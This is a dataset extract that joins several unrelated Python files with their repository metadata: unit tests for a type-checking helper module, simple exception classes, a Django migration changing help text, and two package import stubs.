        (1, int), (3.5, float), ('hello', str), ([1, 2, 3], list),
        (1, (int, float)), (3.5, (int, float)),
        ('hello', (str, list)), ([1, 2, 3], (str, list)),
    ]
    mismatched = [
        (1, float), (3.5, int), ('hello', list), ([1, 2, 3], str),
        (1, (list, str)), (3.5, (list, str)),
        ('hello', (int, float)), ([1, 2, 3], (int, float)),
    ]
    none_types = [int, float, str, list, (int, float), (str, list)]
    for value, types in matching:
        # allow_none has no effect on non-None values.
        self.assertTrue(checks.is_instance(value, types))
        self.assertTrue(checks.is_instance(value, types, allow_none=True))
    for value, types in mismatched:
        self.assertFalse(checks.is_instance(value, types))
        self.assertFalse(checks.is_instance(value, types, allow_none=True))
    for types in none_types:
        # None never matches a type unless allow_none is set.
        self.assertFalse(checks.is_instance(None, types))
        self.assertTrue(checks.is_instance(None, types, allow_none=True))
def test_check_instance(self):
    """check_instance raises AssertionError on type mismatch; allow_none admits None."""
    matching = [
        (1, int), (3.5, float), ('hello', str), ([1, 2, 3], list),
        (1, (int, float)), (3.5, (int, float)),
        ('hello', (str, list)), ([1, 2, 3], (str, list)),
    ]
    mismatched = [
        (1, float), (3.5, int), ('hello', list), ([1, 2, 3], str),
        (1, (list, str)), (3.5, (list, str)),
        ('hello', (int, float)), ([1, 2, 3], (int, float)),
    ]
    none_types = [int, float, str, list, (int, float), (str, list)]
    for value, types in matching:
        # allow_none has no effect on non-None values.
        checks.check_instance(value, types)
        checks.check_instance(value, types, allow_none=True)
    for value, types in mismatched:
        with self.assertRaises(AssertionError):
            checks.check_instance(value, types)
        with self.assertRaises(AssertionError):
            checks.check_instance(value, types, allow_none=True)
    for types in none_types:
        # None is rejected unless allow_none is set.
        with self.assertRaises(AssertionError):
            checks.check_instance(None, types)
        checks.check_instance(None, types, allow_none=True)
def test_ints(self):
    """Exercise the integer predicates (is_*) and their check_* counterparts."""
    import numpy as np

    def verify(is_fn, check_fn, accepted, rejected):
        # accepted values satisfy the predicate and pass the check;
        # rejected values fail the predicate and make the check raise.
        for value in accepted:
            self.assertTrue(is_fn(value))
            check_fn(value)
        for value in rejected:
            self.assertFalse(is_fn(value))
            with self.assertRaises(AssertionError):
                check_fn(value)
        # None is rejected unless allow_none is set.
        self.assertFalse(is_fn(None))
        with self.assertRaises(AssertionError):
            check_fn(None)
        self.assertTrue(is_fn(None, allow_none=True))
        check_fn(None, allow_none=True)

    # Plain Python int only — numpy ints do not count.
    verify(checks.is_int, checks.check_int,
           accepted=[3], rejected=[3.5, np.int64(3), 'hi'])
    # numpy signed ints only.
    verify(checks.is_some_numpy_int, checks.check_some_numpy_int,
           accepted=[np.int64(3)], rejected=[3, 3.5, 'hi'])
    # numpy unsigned ints only.
    verify(checks.is_some_numpy_uint, checks.check_some_numpy_uint,
           accepted=[np.uint64(3)], rejected=[3, 3.5, 'hi'])
    # Any int flavour.
    verify(checks.is_some_int, checks.check_some_int,
           accepted=[3, np.uint64(3)], rejected=[3.5, 'hi'])
    # Mirrors the original's extra check-only case for np.int64.
    checks.check_some_int(np.int64(3))
def test_floats(self):
    """Exercise the float predicates (is_*) and their check_* counterparts."""
    import numpy as np

    def verify(is_fn, check_fn, accepted, rejected):
        # accepted values satisfy the predicate and pass the check;
        # rejected values fail the predicate and make the check raise.
        for value in accepted:
            self.assertTrue(is_fn(value))
            check_fn(value)
        for value in rejected:
            self.assertFalse(is_fn(value))
            with self.assertRaises(AssertionError):
                check_fn(value)
        # None is rejected unless allow_none is set.
        self.assertFalse(is_fn(None))
        with self.assertRaises(AssertionError):
            check_fn(None)
        self.assertTrue(is_fn(None, allow_none=True))
        check_fn(None, allow_none=True)

    # NB! np.float64/np.double are accepted by is_float as in the original
    # (the original flagged this with "is that right?" comments).
    verify(checks.is_float, checks.check_float,
           accepted=[3.5, np.float64(3.5), np.double(3.5)], rejected=[3, 'hi'])
    verify(checks.is_some_numpy_float, checks.check_some_numpy_float,
           accepted=[np.float64(3.5), np.double(3.5)], rejected=[3, 3.5, 'hi'])
    # NB! np.float64 is accepted by is_some_numpy_double as in the original.
    verify(checks.is_some_numpy_double, checks.check_some_numpy_double,
           accepted=[np.float64(3.5), np.double(3.5)], rejected=[3, 3.5, 'hi'])
    verify(checks.is_some_float, checks.check_some_float,
           accepted=[3.5, np.float64(3.5), np.double(3.5)], rejected=[3, 'hi'])
def test_numbers(self):
    """is_some_number/check_some_number accept Python and numpy ints and floats."""
    import numpy as np
    numbers = [3, 3.5, np.int64(3), np.float64(3.5), np.double(3.5)]
    for value in numbers:
        self.assertTrue(checks.is_some_number(value))
        # Fix: the original asserted is_some_number(np.int64(3)) but never
        # exercised check_some_number(np.int64(3)); the loop now covers it.
        checks.check_some_number(value)
    # None is rejected unless allow_none is set.
    self.assertFalse(checks.is_some_number(None))
    self.assertTrue(checks.is_some_number(None, allow_none=True))
    with self.assertRaises(AssertionError):
        checks.check_some_number(None)
    checks.check_some_number(None, allow_none=True)
    # Strings are never numbers.
    self.assertFalse(checks.is_some_number('hi'))
    with self.assertRaises(AssertionError):
        checks.check_some_number('hi')
def test_numpy_arrays(self):
    """is_numpy_array/check_numpy_array accept np.ndarray only (any rank)."""
    import numpy as np
    arrays = [
        np.array([1, 2, 3]),
        np.array([[1, 2, 3], [1, 2, 3]]),
        np.array(3),  # zero-dimensional arrays count too
    ]
    non_arrays = [[1, 2, 3], 3, np.int64(3), 3.5, np.float64(3.5), 'hi']
    for a in arrays:
        self.assertTrue(checks.is_numpy_array(a))
        checks.check_numpy_array(a)
    for value in non_arrays:
        # numpy scalars are not arrays.
        self.assertFalse(checks.is_numpy_array(value))
        with self.assertRaises(AssertionError):
            checks.check_numpy_array(value)
    # None is rejected unless allow_none is set.
    self.assertFalse(checks.is_numpy_array(None))
    self.assertTrue(checks.is_numpy_array(None, allow_none=True))
    with self.assertRaises(AssertionError):
        checks.check_numpy_array(None)
    checks.check_numpy_array(None, allow_none=True)
def test_strings(self):
    """is_string/check_string accept str only; allow_none admits None."""
    non_strings = [[1, 2, 3], 3, 3.5]
    for value in non_strings:
        self.assertFalse(checks.is_string(value))
        with self.assertRaises(AssertionError):
            checks.check_string(value)
    # All three quote spellings denote the same str value; kept as before.
    for s in ('hi', "hi", """hi"""):
        self.assertTrue(checks.is_string(s))
        checks.check_string(s)
    # None is rejected unless allow_none is set.
    self.assertFalse(checks.is_string(None))
    self.assertTrue(checks.is_string(None, allow_none=True))
    with self.assertRaises(AssertionError):
        checks.check_string(None)
    checks.check_string(None, allow_none=True)
def test_dates(self):
    """is_date/check_date and the some_* variants accept dt.date instances only."""
    import datetime as dt
    import numpy as np
    import pandas as pd
    non_dates = [
        [1, 2, 3], 3, 3.5,
        'hi', "hi", """hi""",  # three spellings of the same literal, as before
        dt.time(12, 3),
        dt.datetime(2019, 9, 10, 12, 3),  # a datetime is not a plain date here
        dt.timedelta(seconds=5),
        np.timedelta64(5, 's'),
        pd.Timedelta(5, 's'),
    ]
    pairs = [
        (checks.is_date, checks.check_date),
        (checks.is_some_date, checks.check_some_date),
    ]
    for is_fn, check_fn in pairs:
        for value in non_dates:
            self.assertFalse(is_fn(value))
            with self.assertRaises(AssertionError):
                check_fn(value)
        self.assertTrue(is_fn(dt.date(2019, 9, 10)))
        check_fn(dt.date(2019, 9, 10))
        # None is rejected unless allow_none is set.
        self.assertFalse(is_fn(None))
        self.assertTrue(is_fn(None, allow_none=True))
        with self.assertRaises(AssertionError):
            check_fn(None)
        check_fn(None, allow_none=True)
def test_times(self):
    """is_time/check_time and the some_* variants accept dt.time instances only."""
    import datetime as dt
    import numpy as np
    import pandas as pd
    non_times = [
        [1, 2, 3], 3, 3.5,
        'hi', "hi", """hi""",  # three spellings of the same literal, as before
        dt.date(2019, 9, 10),
        dt.datetime(2019, 9, 10, 12, 3),  # a datetime is not a plain time here
        dt.timedelta(seconds=5),
        np.timedelta64(5, 's'),
        pd.Timedelta(5, 's'),
    ]
    pairs = [
        (checks.is_time, checks.check_time),
        (checks.is_some_time, checks.check_some_time),
    ]
    for is_fn, check_fn in pairs:
        for value in non_times:
            # Fix: the original omitted the is_some_time(...) False assertions
            # for np.timedelta64/pd.Timedelta although it asserted that
            # check_some_time raises for them (test_dates covers both sides);
            # the shared loop now tests predicate and check symmetrically.
            self.assertFalse(is_fn(value))
            with self.assertRaises(AssertionError):
                check_fn(value)
        self.assertTrue(is_fn(dt.time(12, 3)))
        check_fn(dt.time(12, 3))
        # None is rejected unless allow_none is set.
        self.assertFalse(is_fn(None))
        self.assertTrue(is_fn(None, allow_none=True))
        with self.assertRaises(AssertionError):
            check_fn(None)
        check_fn(None, allow_none=True)
def test_datetimes(self):
    """Exercise checks.is_datetime/check_datetime and the *_some_datetime variants."""
    import datetime as dt
    import numpy as np
    import pandas as pd

    # Everything here must be rejected by is_datetime/check_datetime.
    non_datetimes = [
        [1, 2, 3], 3, 3.5, 'hi', "hi", """hi""",
        dt.date(2019, 9, 10), dt.time(12, 3),
        dt.timedelta(seconds=5), np.timedelta64(5, 's'), pd.Timedelta(5, 's'),
    ]

    for value in non_datetimes:
        self.assertFalse(checks.is_datetime(value))
    self.assertTrue(checks.is_datetime(dt.datetime(2019, 9, 10, 12, 3)))
    self.assertFalse(checks.is_datetime(None))
    self.assertTrue(checks.is_datetime(None, allow_none=True))

    for value in non_datetimes:
        with self.assertRaises(AssertionError):
            checks.check_datetime(value)
    checks.check_datetime(dt.datetime(2019, 9, 10, 12, 3))
    with self.assertRaises(AssertionError):
        checks.check_datetime(None)
    checks.check_datetime(None, allow_none=True)

    # The original is_some_datetime probes omit the np/pd timedeltas
    # (the last two list entries), so only the first nine are replayed here.
    for value in non_datetimes[:9]:
        self.assertFalse(checks.is_some_datetime(value))
    self.assertTrue(checks.is_some_datetime(dt.datetime(2019, 9, 10, 12, 3)))
    self.assertFalse(checks.is_some_datetime(None))
    self.assertTrue(checks.is_some_datetime(None, allow_none=True))

    for value in non_datetimes:
        with self.assertRaises(AssertionError):
            checks.check_some_datetime(value)
    checks.check_some_datetime(dt.datetime(2019, 9, 10, 12, 3))
    with self.assertRaises(AssertionError):
        checks.check_some_datetime(None)
    checks.check_some_datetime(None, allow_none=True)
def test_timedeltas(self):
    """Exercise checks.is_timedelta/check_timedelta and the *_some_timedelta variants."""
    import datetime as dt
    import numpy as np
    import pandas as pd

    # Values that are not timedeltas of any flavor.
    non_timedeltas = [
        [1, 2, 3], 3, 3.5, 'hi', "hi", """hi""",
        dt.date(2019, 9, 10), dt.time(12, 3), dt.datetime(2019, 9, 10, 12, 3),
    ]

    for value in non_timedeltas:
        self.assertFalse(checks.is_timedelta(value))
    self.assertTrue(checks.is_timedelta(dt.timedelta(seconds=5)))
    self.assertFalse(checks.is_timedelta(np.timedelta64(5, 's')))
    # NB! Note that the following is true:
    self.assertTrue(checks.is_timedelta(pd.Timedelta(5, 's')))
    self.assertFalse(checks.is_timedelta(None))
    self.assertTrue(checks.is_timedelta(None, allow_none=True))

    for value in non_timedeltas:
        with self.assertRaises(AssertionError):
            checks.check_timedelta(value)
    checks.check_timedelta(dt.timedelta(seconds=5))
    with self.assertRaises(AssertionError):
        checks.check_timedelta(np.timedelta64(5, 's'))
    # NB! Note that the following holds:
    checks.check_timedelta(pd.Timedelta(5, 's'))
    with self.assertRaises(AssertionError):
        checks.check_timedelta(None)
    checks.check_timedelta(None, allow_none=True)

    # The *_some_timedelta variants accept all three timedelta flavors.
    for value in non_timedeltas:
        self.assertFalse(checks.is_some_timedelta(value))
    for value in (dt.timedelta(seconds=5), np.timedelta64(5, 's'), pd.Timedelta(5, 's')):
        self.assertTrue(checks.is_some_timedelta(value))
    self.assertFalse(checks.is_some_timedelta(None))
    self.assertTrue(checks.is_some_timedelta(None, allow_none=True))

    for value in non_timedeltas:
        with self.assertRaises(AssertionError):
            checks.check_some_timedelta(value)
    checks.check_some_timedelta(dt.timedelta(seconds=5))
    checks.check_some_timedelta(np.timedelta64(5, 's'))
    checks.check_some_timedelta(pd.Timedelta(5, 's'))
    with self.assertRaises(AssertionError):
        checks.check_some_timedelta(None)
    checks.check_some_timedelta(None, allow_none=True)
def test_iterables(self):
    """Exercise checks.is_iterable*, check_iterable* and the *_over_instances helpers."""
    import numpy as np

    # Genuinely iterable values (the first entry, a string, matters below).
    iterables = [
        'hi', [1, 2, 3], [[1, 2, 3], [1, 2, 3]],
        np.array([1, 2, 3]), np.array([[1, 2, 3], [1, 2, 3]]),
        {'name': 'Paul', 'surname': 'Bilokon'},
    ]

    for value in (3, 3.5):
        self.assertFalse(checks.is_iterable(value))
    for value in iterables:
        self.assertTrue(checks.is_iterable(value))
    self.assertFalse(checks.is_iterable(None))
    self.assertTrue(checks.is_iterable(None, allow_none=True))

    for value in (3, 3.5):
        with self.assertRaises(AssertionError):
            checks.check_iterable(value)
    for value in iterables:
        checks.check_iterable(value)
    with self.assertRaises(AssertionError):
        checks.check_iterable(None)
    checks.check_iterable(None, allow_none=True)

    # Strings are iterable but are excluded by the *_not_string variants.
    for value in (3, 3.5, 'hi'):
        self.assertFalse(checks.is_iterable_not_string(value))
    for value in iterables[1:]:
        self.assertTrue(checks.is_iterable_not_string(value))
    self.assertFalse(checks.is_iterable_not_string(None))
    self.assertTrue(checks.is_iterable_not_string(None, allow_none=True))

    for value in (3, 3.5, 'hi'):
        with self.assertRaises(AssertionError):
            checks.check_iterable_not_string(value)
    for value in iterables[1:]:
        checks.check_iterable_not_string(value)
    with self.assertRaises(AssertionError):
        checks.check_iterable_not_string(None)
    checks.check_iterable_not_string(None, allow_none=True)

    # is_iterable_over_instances returns (flag, iterable) pairs.
    matched, it = checks.is_iterable_over_instances(3, int)
    self.assertFalse(matched)
    self.assertEqual(it, 3)
    matched, it = checks.is_iterable_over_instances(3.5, float)
    self.assertFalse(matched)
    self.assertEqual(it, 3.5)
    matched, it = checks.is_iterable_over_instances('hi', str)
    self.assertTrue(matched)
    self.assertEqual(list(it), ['h', 'i'])
    matched, it = checks.is_iterable_over_instances([1, 2, 3], int)
    self.assertTrue(matched)
    self.assertEqual(list(it), [1, 2, 3])
    matched, it = checks.is_iterable_over_instances([[1, 2, 3], [1, 2, 3]], list)
    self.assertTrue(matched)
    self.assertEqual(list(it), [[1, 2, 3], [1, 2, 3]])
    matched, it = checks.is_iterable_over_instances(np.array([1, 2, 3]), np.int32)
    self.assertTrue(matched)
    self.assertEqual(list(it), [1, 2, 3])
    # NB! In this case the iterable that was passed in does not quite match the returned iterable
    matched, _ = checks.is_iterable_over_instances(np.array([[1, 2, 3], [1, 2, 3]]), np.ndarray)
    self.assertTrue(matched)
    matched, it = checks.is_iterable_over_instances({'name': 'Paul', 'surname': 'Bilokon'}, str)
    self.assertTrue(matched)
    self.assertEqual(list(it), ['name', 'surname'])
    matched, it = checks.is_iterable_over_instances([], int)
    self.assertFalse(matched)
    matched, it = checks.is_iterable_over_instances([], int, allow_empty=True)
    self.assertTrue(matched)
    matched, it = checks.is_iterable_over_instances(None, int)
    self.assertFalse(matched)
    self.assertIsNone(it)
    matched, it = checks.is_iterable_over_instances(None, int, allow_none=True)
    self.assertTrue(matched)
    self.assertIsNone(it)

    # check_iterable_over_instances returns the iterable directly or raises.
    with self.assertRaises(AssertionError):
        checks.check_iterable_over_instances(3, int)
    with self.assertRaises(AssertionError):
        checks.check_iterable_over_instances(3.5, float)
    self.assertEqual(list(checks.check_iterable_over_instances('hi', str)), ['h', 'i'])
    self.assertEqual(list(checks.check_iterable_over_instances([1, 2, 3], int)), [1, 2, 3])
    self.assertEqual(
        list(checks.check_iterable_over_instances([[1, 2, 3], [1, 2, 3]], list)),
        [[1, 2, 3], [1, 2, 3]])
    self.assertEqual(list(checks.check_iterable_over_instances(np.array([1, 2, 3]), np.int32)), [1, 2, 3])
    # NB! In this case the iterable that was passed in does not quite match the returned iterable
    _ = checks.check_iterable_over_instances(np.array([[1, 2, 3], [1, 2, 3]]), np.ndarray)
    self.assertEqual(
        list(checks.check_iterable_over_instances({'name': 'Paul', 'surname': 'Bilokon'}, str)),
        ['name', 'surname'])
    with self.assertRaises(AssertionError):
        checks.check_iterable_over_instances([], int)
    checks.check_iterable_over_instances([], int, allow_empty=True)
    with self.assertRaises(AssertionError):
        checks.check_iterable_over_instances(None, int)
    self.assertIsNone(checks.check_iterable_over_instances(None, int, allow_none=True))
def test_dicts(self):
    """Exercise checks.is_dict/check_dict and the *_some_dict variants."""
    import collections as col
    import numpy as np

    non_dicts = [
        3, 3.5, 'hi', [1, 2, 3], [[1, 2, 3], [1, 2, 3]],
        np.array([1, 2, 3]), np.array([[1, 2, 3], [1, 2, 3]]),
    ]
    # Both a plain dict and an OrderedDict must be accepted.
    dicts = [
        {'name': 'Paul', 'surname': 'Bilokon'},
        col.OrderedDict((('name', 'Paul'), ('surname', 'Bilokon'))),
    ]

    for value in non_dicts:
        self.assertFalse(checks.is_dict(value))
    for value in dicts:
        self.assertTrue(checks.is_dict(value))
    self.assertFalse(checks.is_dict(None))
    self.assertTrue(checks.is_dict(None, allow_none=True))

    for value in non_dicts:
        with self.assertRaises(AssertionError):
            checks.check_dict(value)
    for value in dicts:
        checks.check_dict(value)
    with self.assertRaises(AssertionError):
        checks.check_dict(None)
    checks.check_dict(None, allow_none=True)

    for value in non_dicts:
        self.assertFalse(checks.is_some_dict(value))
    for value in dicts:
        self.assertTrue(checks.is_some_dict(value))
    self.assertFalse(checks.is_some_dict(None))
    self.assertTrue(checks.is_some_dict(None, allow_none=True))

    for value in non_dicts:
        with self.assertRaises(AssertionError):
            checks.check_some_dict(value)
    for value in dicts:
        checks.check_some_dict(value)
    with self.assertRaises(AssertionError):
        checks.check_some_dict(None)
    checks.check_some_dict(None, allow_none=True)
def test_callables(self):
    """Exercise checks.is_callable/check_callable on callables and non-callables."""
    import numpy as np

    non_callables = [
        3, 3.5, 'hi', [1, 2, 3], [[1, 2, 3], [1, 2, 3]],
        np.array([1, 2, 3]), np.array([[1, 2, 3], [1, 2, 3]]),
        {'name': 'Paul', 'surname': 'Bilokon'},
    ]

    for value in non_callables:
        self.assertFalse(checks.is_callable(value))

    def my_func():
        return 123

    self.assertTrue(checks.is_callable(my_func))
    self.assertTrue(checks.is_callable(lambda x, y: x + y))
    self.assertFalse(checks.is_callable(None))
    self.assertTrue(checks.is_callable(None, allow_none=True))

    for value in non_callables:
        with self.assertRaises(AssertionError):
            checks.check_callable(value)

    def my_func1():
        return 123

    checks.check_callable(my_func1)
    checks.check_callable(lambda x, y: x + y)
    with self.assertRaises(AssertionError):
        checks.check_callable(None)
    checks.check_callable(None, allow_none=True)
def test_type(self):
    """Exercise checks.is_type/check_type: only type objects qualify."""
    import numpy as np

    for value in (3, 'hi', [1, 2, 3]):
        self.assertFalse(checks.is_type(value))
    for value in (int, np.ndarray):
        self.assertTrue(checks.is_type(value))
    self.assertFalse(checks.is_type(None))
    self.assertTrue(checks.is_type(None, allow_none=True))

    for value in (3, 'hi', [1, 2, 3]):
        with self.assertRaises(AssertionError):
            checks.check_type(value)
    for value in (int, np.ndarray):
        checks.check_type(value)
    with self.assertRaises(AssertionError):
        checks.check_type(None)
    checks.check_type(None, allow_none=True)
# Run the whole test suite when this file is executed as a script.
if __name__ == '__main__':
    unittest.main()
| 49.10579
| 108
| 0.652047
| 8,962
| 68,699
| 4.766793
| 0.015733
| 0.079588
| 0.135183
| 0.205337
| 0.979799
| 0.959621
| 0.905641
| 0.855056
| 0.764771
| 0.661119
| 0
| 0.028909
| 0.218533
| 68,699
| 1,398
| 109
| 49.140916
| 0.766829
| 0.015517
| 0
| 0.271908
| 0
| 0
| 0.015929
| 0
| 0
| 0
| 0
| 0
| 0.59869
| 1
| 0.027027
| false
| 0
| 0.018837
| 0.001638
| 0.048321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6c9eaa6bb0e41244f2a4c65b80f3f9f7209c6927
| 570
|
py
|
Python
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 3
|
2016-09-28T12:33:23.000Z
|
2017-04-29T02:40:00.000Z
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 1
|
2015-05-31T08:41:47.000Z
|
2015-05-31T08:41:47.000Z
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 5
|
2015-01-26T02:43:57.000Z
|
2021-04-25T00:20:18.000Z
|
class ShellException(Exception):
    """Message-carrying error for shell-related failures (per its name; see callers).

    The message is stored on ``_msg`` and ``str()`` yields its ``repr``,
    matching the original behavior.
    """

    def __init__(self, msg):
        # Chain to Exception so e.args == (msg,); the original skipped this,
        # leaving args empty and breaking pickling / generic args-based handlers.
        super(ShellException, self).__init__(msg)
        self._msg = msg

    def __str__(self):
        # Preserve historical behavior: str(e) is the repr of the message.
        return repr(self._msg)
class ParseException(Exception):
    """Message-carrying error for parsing failures (per its name; see callers).

    The message is stored on ``_msg`` and ``str()`` yields its ``repr``,
    matching the original behavior.
    """

    def __init__(self, msg):
        # Chain to Exception so e.args == (msg,); the original skipped this,
        # leaving args empty and breaking pickling / generic args-based handlers.
        super(ParseException, self).__init__(msg)
        self._msg = msg

    def __str__(self):
        # Preserve historical behavior: str(e) is the repr of the message.
        return repr(self._msg)
class TreeException(Exception):
    """Message-carrying error for tree-related failures (per its name; see callers).

    The message is stored on ``_msg`` and ``str()`` yields its ``repr``,
    matching the original behavior.
    """

    def __init__(self, msg):
        # Chain to Exception so e.args == (msg,); the original skipped this,
        # leaving args empty and breaking pickling / generic args-based handlers.
        super(TreeException, self).__init__(msg)
        self._msg = msg

    def __str__(self):
        # Preserve historical behavior: str(e) is the repr of the message.
        return repr(self._msg)
class AccessException(Exception):
    """Message-carrying error for access failures (per its name; see callers).

    The message is stored on ``_msg`` and ``str()`` yields its ``repr``,
    matching the original behavior.
    """

    def __init__(self, msg):
        # Chain to Exception so e.args == (msg,); the original skipped this,
        # leaving args empty and breaking pickling / generic args-based handlers.
        super(AccessException, self).__init__(msg)
        self._msg = msg

    def __str__(self):
        # Preserve historical behavior: str(e) is the repr of the message.
        return repr(self._msg)
| 18.387097
| 33
| 0.624561
| 68
| 570
| 4.647059
| 0.191176
| 0.265823
| 0.202532
| 0.253165
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0
| 0
| 0.270175
| 570
| 30
| 34
| 19
| 0.759615
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
9f764a36792ac7971d122418a66cea501fbfb90d
| 1,821
|
py
|
Python
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 134
|
2017-07-12T17:03:06.000Z
|
2022-03-27T06:38:29.000Z
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 1,362
|
2017-06-22T17:42:49.000Z
|
2022-03-31T15:28:00.000Z
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 38
|
2017-06-22T14:46:23.000Z
|
2022-03-16T05:32:54.000Z
|
# Generated by Django 2.2.8 on 2019-12-16 18:03
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.8: only changes field metadata (help_text)
    # on the JSONB no_index_elided / no_index_redacted fields of casemetadata
    # and historicalcasemetadata (presumably the history twin of the model —
    # confirm against the app's models); no schema change is implied.

    dependencies = [
        ('capdb', '0085_auto_20191211_1708'),
    ]

    operations = [
        migrations.AlterField(
            model_name='casemetadata',
            name='no_index_elided',
            field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Elided text will be shown on click. Example: {"Text to elide (must be exact match)": "Extra text that\'s currently not used. Can be left as empty string."}', null=True),
        ),
        migrations.AlterField(
            model_name='casemetadata',
            name='no_index_redacted',
            field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Redacted text will be hidden from view and replaced with key\'s value specified above. Example: {"Text to redact (must be exact match)": "Text to replace redacted text."}', null=True),
        ),
        migrations.AlterField(
            model_name='historicalcasemetadata',
            name='no_index_elided',
            field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Elided text will be shown on click. Example: {"Text to elide (must be exact match)": "Extra text that\'s currently not used. Can be left as empty string."}', null=True),
        ),
        migrations.AlterField(
            model_name='historicalcasemetadata',
            name='no_index_redacted',
            field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Redacted text will be hidden from view and replaced with key\'s value specified above. Example: {"Text to redact (must be exact match)": "Text to replace redacted text."}', null=True),
        ),
    ]
| 52.028571
| 272
| 0.673806
| 234
| 1,821
| 5.162393
| 0.324786
| 0.029801
| 0.086921
| 0.111755
| 0.877483
| 0.850993
| 0.850993
| 0.850993
| 0.807119
| 0.807119
| 0
| 0.021739
| 0.216914
| 1,821
| 34
| 273
| 53.558824
| 0.825386
| 0.024712
| 0
| 0.714286
| 1
| 0.107143
| 0.348365
| 0.037768
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cc0e1ec8ecfb2bed241592acede35f1c828415a
| 270
|
py
|
Python
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 304
|
2020-06-19T05:00:14.000Z
|
2022-03-19T19:39:04.000Z
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 4
|
2020-06-28T11:30:33.000Z
|
2022-02-17T14:31:39.000Z
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 15
|
2020-06-19T08:34:56.000Z
|
2022-02-17T14:51:30.000Z
|
from xfeat.optuna_selector._kbest_explorer import KBestThresholdExplorer # NOQA
from xfeat.optuna_selector._gbdt_feature_explorer import GBDTFeatureExplorer # NOQA
from xfeat.optuna_selector._group_combination_explorer import ( # NOQA
GroupCombinationExplorer,
)
| 45
| 84
| 0.855556
| 29
| 270
| 7.586207
| 0.517241
| 0.122727
| 0.204545
| 0.313636
| 0.245455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 270
| 5
| 85
| 54
| 0.90535
| 0.051852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4cd595047830d70da5bff180d908cd24121d24e8
| 148
|
py
|
Python
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 172
|
2020-03-19T19:50:53.000Z
|
2022-03-28T09:36:04.000Z
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 702
|
2020-03-19T08:09:04.000Z
|
2022-03-30T09:55:14.000Z
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 17
|
2020-04-07T03:11:02.000Z
|
2022-02-02T20:39:16.000Z
|
from cellrank.tl.estimators.mixins.decomposition._eigen import EigenMixin
from cellrank.tl.estimators.mixins.decomposition._schur import SchurMixin
| 49.333333
| 73
| 0.878378
| 18
| 148
| 7.111111
| 0.611111
| 0.1875
| 0.21875
| 0.375
| 0.671875
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 148
| 2
| 74
| 74
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
